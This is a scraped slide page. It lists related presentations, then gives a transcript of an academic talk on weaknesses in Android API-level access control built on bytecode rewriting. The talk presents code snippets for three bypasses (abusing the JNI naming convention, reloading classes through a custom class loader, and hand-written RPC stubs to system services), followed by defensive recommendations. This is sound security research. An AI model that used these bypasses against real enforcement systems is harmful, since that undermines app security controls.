Wenliang Du Syracuse University Vicky Singh Syracuse University Hao Syracuse University.

Slides:

Advertisements

Similar presentations

Mobile Code Security Yurii Kuzmin. What is Mobile Code? Term used to describe general-purpose executables that run in remote locations. Web browsers come.

Advertisements

What is RMI? Remote Method Invocation –A true distributed computing application interface for Java, written to provide easy access to objects existing.

Syracuse University, New York, USA

DroidScope: Seamlessly Reconstructing the OS and Dalvik Semantic Views for Dynamic Android Malware Analysis Lok Kwong Yan, and Heng Yin Syracuse University.

Portability and Safety Mahdi Milani Fard Dec, 2006 Java.

Aurasium: Practical Policy Enforcement for Android Applications By Yaoqi USENIX Security Symposium 2012.

On the Effectiveness of API-Level Access Control Using Bytecode Rewriting in Android Presenter: Lu Gong.

1 InTroToJCL Introduction to Java Class Loaders. 2 class loader l ia an object responsible for loading classes. The class ClassLoader is an abstract class.

Copyright © 2001 Qusay H. Mahmoud Case Study A Global Compute Engine Here we will discuss some implementation details: – Class Loaders – Compute Engine.

Policy Weaving for Mobile Devices Drew Davidson. Smartphone security is critical – 1200 to 1400 US Army troops to be equipped with Android smartphones.

Inlining Java Native Calls at Runtime (CASCON 2005 – 4 th Workshop on Compiler Driven Performance) Levon Stepanian, Angela Demke Brown Computer Systems.

Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson Presented By: Rajat Khandelwal – 2009CS10209 Parikshit.

The road to reliable, autonomous distributed systems

Aurasium: Practical Policy Enforcement for Android Applications R. Xu, H. Saidi and R. Anderson.

1 Extensible Security Architectures for Java Authors: Dan S.Wallch, Dirk Balfanz Presented by Moonjoo Kim.

Remote Method Invocation Chin-Chih Chang. Java Remote Object Invocation In Java, the object is serialized before being passed as a parameter to an RMI.

Edward Tsai – CS 239 – Spring 2003 Strong Security for Active Networks CS 239 – Network Security Edward Tsai Tuesday, May 13, 2003.

Principles of Object-Oriented Software Development The language Java.

Institute of Computing Jaca: a Reflective Fault Injection Tool based on Patterns Eliane Martins Cecilia Rubira Nelson Leme Institute of Computing State.

Asst.Prof.Dr.Ahmet Ünveren SPRING Computer Engineering Department Asst.Prof.Dr.Ahmet Ünveren SPRING Computer Engineering Department.

R ETRO S KELETON : R ETROFITTING A NDROID A PPS Benjamin Davis, Hao Chen University of California, Davis MobiSys 2013.

Java Security Updated May Topics Intro to the Java Sandbox Language Level Security Run Time Security Evolution of Security Sandbox Models The Security.

Java Security. Topics Intro to the Java Sandbox Language Level Security Run Time Security Evolution of Security Sandbox Models The Security Manager.

Lei Wu, Michael Grace, Yajin Zhou, Chiachih Wu, Xuxian Jiang Department of Computer Science North Carolina State University CCS 2013.

Java Programming Robert Chatley William Lee

Authors: William Enck The Pennsylvania State University Peter Gilbert Duke University Byung-Gon Chun Intel Labs Landon P. Cox Duke University Jaeyeon Jung.

@2011 Mihail L. Sichitiu1 Android Introduction Platform Overview.

What is Android NDK ● A toolset that lets you embed in you app native source code ● C, C++(recently supported December 2010) and assembly(?) ● It is supported.

ANDROID Presented By Mastan Vali.SK. © artesis 2008 | 2 1. Introduction 2. Platform 3. Software development 4. Advantages Main topics.

DeepDroid: Dynamically Enforcing Enterprise Policy on Android Devices Fall 2015 Instructor: Kun Sun, Ph.D.

CASE STUDY 1: Linux and Android Tanenbaum & Bo, Modern Operating Systems:4th ed., (c) 2013 Prentice-Hall, Inc. All rights reserved.

Introduction to Java Prepared by: Ahmed Hefny. Outline Classes Access Levels Member Initialization Inheritance and Polymorphism Interfaces Inner Classes.

1 Module Objective & Outline Module Objective: After completing this Module, you will be able to, appreciate java as a programming language, write java.

The Terminator to Android Hardening Services

Rutgers University Excellence Campaign 2/20/2004 Java Native Interface Tutorial Xiaolin Li Rutgers.

Java Introduction to JNI Prepared by Humaira Siddiqui.

CIS 644 Aug. 25, 1999 tour of Java. First … about the media lectures… we are experimenting with the media format please give feedback.

Java Security Nathan Moore CS 665. Overview Survey of Java Inherent Security Properties Java Runtime Environment Java Virtual Machine Java Security Model.

Java 2 security model Valentina Casola. Components of Java the development environment –development lifecycle –Java language features –class files and.

Tu sca ny 1 Extending The Tuscany Java SCA Runtime 21 August 2006.

Software Engineering Design Patterns. Singleton Single instance of class Constructor is private static final Class instance constructed when application.

2011/12/20 1 Tongbo Luo, Hao Hao, Wenliang Du, Yifei Wang, and Heng Yin Syracuse University ACSAC 2011.

Copyright © cs-tutorial.com. Overview Introduction Architecture Implementation Evaluation.

Android JNI and JAR Library JNI Library 1. JNI *.c sources file must include jni header file jni.h #include 2. In Make file CFLAGS must add -I $(NDK_INC)/

Liang, Introduction to Java Programming, Seventh Edition, (c) 2009 Pearson Education, Inc. All rights reserved Chapter 43 Remote Method Invocation.

M. Alexander Helen J. Wang Yunxin Liu Microsoft Research 1 Presented by Zhaoliang Duan.

Jaas Introduction. Outline l General overview of Java security Java 2 security model How is security maintained by Java and JVM? How can a programmer.

Garbage Collection and Classloading Java Garbage Collectors  Eden Space  Surviver Space  Tenured Gen  Perm Gen  Garbage Collection Notes Classloading.

Slide Advanced Programming 2004, based on LY Stefanus's slides Native Methods.

Wireless and Mobile Security

JS (Java Servlets). Internet evolution [1] The internet Internet started of as a static content dispersal and delivery mechanism, where files residing.

A Multi-Dimensional Configurable Access Control Framework for Mobile Applications By: Yaira K. Rivera Sánchez Major Advisor: Steven A. Demurjian.

DeepDroid Dynamically Enforcing Enterprise Policy Manwoong (Andy) Choi

Java & The Android Stack: A Security Analysis Pragati Ogal Rai Mobile Technology Evangelist PayPal, eBay Java.

1 Chapter 2: Operating-System Structures Services Interface provided to users & programmers –System calls (programmer access) –User level access to system.

CopperDroid Logan Horton. Android - Background Android is complicated to analyse due to having 2 places to check for code execution Normally, code is.

COMPSCI 702 DeepDroid Dynamically Enforcing Enterprise Policy on Android Devices Presenter: Jie Yuan (Jeff)

Sung-Dong Kim, Dept. of Computer Engineering, Hansung University Java - Introduction.

January 26, Ann Wollrath Copyright 1999 Sun Microsystems, Inc., all rights reserved. Java ™ RMI Overview Ann Wollrath Senior Staff Engineer Sun Microsystems,

Multitasking without Compromise: a Virtual Machine Evolution

Security and Programming Language Work on SmartPhones

Boxify: Full-fledged App Sandboxing for Stock Android

chapter 6- Android Introduction

AppShield: Enabling Multi-entity Access Control Cross Platforms for Mobile App Management Zhengyang Qu1, Guanyu Guo2, Zhengyue Shao2, Vaibhav Rastogi3,

What is RMI? Remote Method Invocation

MobiSys 2017 Symbolic Execution of Android Framework with Applications to Vulnerability Discovery and Exploit Generation Qiang Zeng joint work with Lannan.

Topic: Java Security Models

CMPE419 Mobile Application Development

Suwen Zhu, Long Lu, Kapil Singh

CMPE419 Mobile Application Development

Presentation transcript:

Wenliang Du Syracuse University Vicky Singh Syracuse University Hao Syracuse University

Agenda Introduction on API-level Access Control using Bytecode Rewriting Analysis on Existing Works Attacks Recommendations

Android Permission System Current Android install-time permission system Coarse-grained Permissions e.g., INTERNET permission Application Android API Privileged Resources Check Permissions

API-level Access Control Impose fine-grained access control Instrument applications Bytecode rewriting Native library rewriting Modify Android platform Flexibility Rich context information Easy deployment

Existing Works Bytecode rewriting Improving privacy on android smartphones through in-vivo bytecode instrumentation. A. Bartel, J. Klein, K. Allix, Y. Traon, and M. Monperrus. I-arm-droid: A rewriting framework for in-app reference monitors for android applications. B. Davis, B. Sanders, A. Khodaverdian, and H. Chen. Dr. android and Mr. hide: Fine-grained security policies on unmodified android. J. Jeon, K. K. Micinski, and J. A. Vaughan Application-centric security policies on unmodified android. N. Reddy, J. Jeon, J. Vaughan, T. Millstein, and J. Foster

Objective Systematic evaluation to assess the effectiveness of API-level access control using bytecode rewriting on Android platform

API-level Access Control Using Bytecode Rewriting Design Implementation ApplicationAndroid API Privileged Resources Secure Wrapper Secure App.apk Dalvik Bytecode Static Analysis Dalvik Bytecode Rewriting Repackage and Resigning OriginalApp.apk

Android API Architecture System Server Process Linux Kernel Application Android APIs System Services Secure Wrapper Native Shared Library Binder Java Native Interface Application Process Dalvik Virtual Machine Kernel Space Privileged Resources

Effectiveness of API-level Access Control System Server Process Linux Kernel Application Android APIs System Services Secure Wrapper Native Shared Library Binder Java Native Interface Application Process Dalvik Virtual Machine Kernel Space Privileged Resources

Path 2: Invoke Native Libraries Directly Background: Java Native Interface Enable communications between Java code and native code. Usage package edu.com; public class MyClass { native public long myFunc(); static { System.loadLibrary("myLib"); } JNIEXPORT jlong Java_edu_com_MyClass_myFunc( JNIEnv* env, jobject thiz); myLib.so static JNINativeMethod method_table [] = {{ "myFunc", "(J)J", (void *) myFunc_Implementation }}; extern "C" jint JNI_OnLoad(JavaVM* vm,... ) { jclass c = env->FindClass("edu/com/MyClass"); env->RegisterNatives(c, method_table, 1); }

Path 2: Exploit JNI Naming Convention Objective Invoke a native library function without going through its corresponding Java API to evade the restriction enforced by the secure wrapper. Android APIs Secure Wrapper Shared Libraries Application Methods JNI

Path 2: Exploit JNI Naming Convention Attempts 1: (Fail) Attempts 2: (Success) package edu.com; public class MyClass { native public long my_Func(); } package edu.com.MyClass; public class my { native public long Func(); } package edu.com.MyClass; public class my { native long 1Func(); static { System.loadLibrary(’myLib’); } JNIEXPORT jlong Java_edu_com_MyClass_my_1Func( JNIEnv* env, jobject thiz); JNIEXPORT jlong Java_edu_com_MyClass_my_Func( JNIEnv* env, jobject thiz);

Path 2: Case Study In sqlite_jni library, we found functions with the "_1" pattern in the names. By invoking SQLite.Database.error.1string we successfully invoked Java_SQLite_Database_error_1string. package SQLite.Database; public class error { public static native String 1string(...); static{ System.loadLibrary(’sqlite_jni’); } } JNIEXPORT jstring JNICALL Java_SQLite_Database_error_1string(JNIEnv *env, …) { … } sqlite_jni.so

Path 2: Exploit Java Class Reloading Objective modify the implementation of the APIs that the wrapper is trying to protect. Application Customized Android APIs Secure Wrapper Shared Libraries Class Loader JNI

Path 2: Exploit Java Class Reloading Attempts 1: (Fail) use DexClassLoader to load redefined class package android.hardware; public class Camera{ final public void someFunc() { //Calling the privileged function privilegedFunc(); } native void privilegedFunc(); } DexClassLoader classLoader = new DexClassLoader ("Camera.apk",..., getClassLoader()); Class mClass = classLoader.loadClass("android.hardware.Camera"); android.hardware.Camera c = (android.hardware.Camera)mClass.newInstance(); //Access the privileged native code through someFunc() c.someFunc(); Class cannot be loaded again

Path 2: Exploit Java Class Reloading Attempts 2: (Success) Use user-define class loader package android.hardware; public class Camera{ final public void someFunc() { //Calling the privileged function privilegedFunc(); } native void privilegedFunc(); } public class MyDexLoader extends BaseDexClassLoader { // Constructor public Class loadClass(String s) { Class c; try { c = super.findClass(s); return c; } catch (ClassNotFoundException e) { // handling the exceptions } return null; } } Override loading policy

Path 2: Case Study Performed our attack on a camera application. Bytecode rewriter enforced finer-grained access control on method Camera.takePicture reload redefined android.hardware.Camera class into a new class loader. public class SecureCamera{ public static void takePicture(Camera camera,...){ Time now = new Time(); now.setToNow(); if(now.hour > 8 && now.hour < 18) { camera.takePicture(...); }}} package android.hardware; public class Camera { public void takeMyPicture(...) {...}} Take pictures between 8am to 6pm

Path 2: Case Study Associate native Java methods of Camera class with corresponding native library functions. Then attackers can use their customized class definition //Create a customized class loader MyDexLoader ld = new MyDexLoader(...); //Load redefined Camera class Class c = ld.loadClass("android.hardware.Camera"); Class util = ld.loadClass("com.android.internal.util.WithFramework"); Method m = util.getDeclaredMethod("registerNatives",...); m.invoke(...); //Invoke takeMyPicture method using reflection m = c.getDeclaredMethod("takeMyPicture",...); m.invoke(...);... } registers native functions with Camera Java class

Path 2: Recommendations Recommendations for Exploit JNI Naming Convention If any Java methods start with numbers, bytecode rewriter should remove the digit as it is illegal. Recommendations for Exploit Java Class Reloading One possible way is bytecode rewriter should restrict all the invocations of methods within the call chain from findClass in the class BaseDexClassLoader to loadClass in DexFile.

Path 3: Exploit Customized RPC Stubs Objective Applications code can directly communicate with the system services without going through APIs that invoke RPC stubs. Attack write attackers own RPC stub to communicate with System Service Secure Wrapper Native Shared Library Customized RPC Stubs Application Android APIs

Path 3: Case Study Evaluated on a geolocation application. Bytecode rewriter enforced fine access control policy on method getLastKnownLocation. class SecureLocationManager extends LocationManager{ public Location getLastKnownLocation(...) { Location loc = super.getLastKnownLocation(...); if(loc.getLatitude()>60&&loc.getLatitude()<70&& loc.getLongtitude()>140&&loc.getLongtitude() <160) { return loc; }} Retrieve location information when the location is within Alaska.

Path 3: Case Study Attackers can introduce customized RPC with different method signature. Use customized RPC with different method signature to bypass access control placed on getLastKnownLocation API. package my.location; /* User-defined RPC stub class */ public interface LocMgr extends android.os.IInterface { public static abstract class Stub extends android.os.Binder implements my.location.LocMgr {...}} import my.location.LocMgr; IBinder b=android.os.ServiceManager.getService(LOCATION_SERVICE); LocMgr sLocationManger = LocMgr.Stub.asInterface(b); Location loc = sLocationManger.getLastKnownLocation(...);

Path 3: Recommendation The fix is to apply the API-level access control on android.os.ServiceManager’s getService API, so application’s Java code cannot use this API to get system services.

Conclusion Our work manifests the need to address all the above attacks to fulfill an effective API-level access control using bytecode rewriting.

Questions?